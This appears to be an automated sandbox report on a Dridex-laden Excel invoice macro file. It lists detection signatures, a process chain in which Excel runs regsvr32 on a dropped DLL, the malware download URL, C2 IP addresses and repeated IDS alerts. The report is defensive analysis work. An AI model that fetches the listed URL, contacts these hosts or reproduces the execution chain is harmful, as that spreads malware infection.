Play interactive tour

Edit tour

Analysis Report INV2680371456-20210111889374.xlsm

Overview

General Information

Sample Name:	INV2680371456-20210111889374.xlsm
Analysis ID:	338309
MD5:	9b7c2b0abf5478ef9a23d9a9e87c7835
SHA1:	6931c4b845a8a952699d9cf85b316e3b3d826a41
SHA256:	a463f9a8842a5c947abaa2bff1b621835ff35f65f9d3272bf1fa5197df9f07d0
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: BlueMashroom DLL Load

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Document contains an embedded VBA macro which may execute processes

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Machine Learning detection for dropped file

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Regsvr32 Anomaly

Adds / modifies Windows certificates

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Downloads executable code via HTTP

Drops PE files

Drops certificate files (DER)

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains sections with non-standard names

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the installation date of Windows

Registers a DLL

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 2292 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

regsvr32.exe (PID: 2500 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2504 cmdline: -s C:\Users\user\AppData\Local\Temp\aymakjne.dll. MD5: 432BE6CF7311062633459EEF6B242FB5)

DW20.EXE (PID: 2448 cmdline: 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1840 MD5: 45A078B2967E0797360A2D4434C41DB4)

DWWIN.EXE (PID: 1296 cmdline: C:\Windows\system32\dwwin.exe -x -s 1840 MD5: 25247E3C4E7A7A73BAEEA6C0008952B1)

cleanup

Malware Configuration

Threatname: Dridex

{"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 61074", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: BlueMashroom DLL Load

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2292, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., ProcessId: 2500

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2292, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., ProcessId: 2500

Sigma detected: Regsvr32 Anomaly

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://truxiellogroup.com/d0l359.rar

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 4.2.regsvr32.exe.240000.1.raw.unpack

Malware Configuration Extractor: Dridex {"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 61074", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}

Multi AV Scanner detection for domain / URL

Show sources

Source: https://77.220.64.37/

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rar	ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Local\Temp\aymakjne.dll	ReversingLabs: Detection: 37%

Multi AV Scanner detection for submitted file

Show sources

Source: INV2680371456-20210111889374.xlsm	Virustotal: Detection: 46%			Perma Link
Source: INV2680371456-20210111889374.xlsm	ReversingLabs: Detection: 32%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\aymakjne.dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rar	Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49179 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49183 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49187 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49191 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49195 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49199 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49203 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49207 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49211 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49215 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49219 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49223 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49229 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49233 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49237 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49241 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49245 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49249 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49253 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49257 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49261 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49265 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49269 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49277 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49281 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49285 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49289 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49293 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49297 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49301 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49305 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49309 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49313 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49317 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49321 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49325 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49329 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49333 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49337 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49341 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49345 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49349 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49353 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49357 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49362 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49366 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49370 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49374 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49378 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49382 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49386 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49390 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49394 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49398 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\aymakjne.dll

Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: d0l359[1].rar.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe

Jump to behavior

Source: global traffic

DNS query: name: truxiellogroup.com

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 77.220.64.37:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 68.65.122.35:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49166
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49168
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49169
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49169
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49171
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49172
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49173
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49173
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49175
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49176
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49177
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49177
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49179
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49180
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49181
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49181
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49183
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49184
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49185
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49185
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49187
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49188
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49189
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49189
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49191
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49192
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49193
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49193
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49195
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49196
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49197
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49197
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49199
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49200
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49201
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49201
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49203
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49204
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49205
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49205
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49207
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49208
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49209
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49209
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49211
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49212
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49213
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49213
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49215
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49216
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49217
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49217
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49219
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49220
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49221
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49221
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49223
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49225
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49226
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49226
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49229
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49230
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49231
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49231
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49233
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49234
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49235
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49235
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49237
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49238
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49239
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49239
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49241
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49242
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49243
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49243
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49245
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49246
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49247
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49247
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49249
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49250
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49251
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49251
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49253
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49254
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49255
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49255
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49257
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49258
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49259
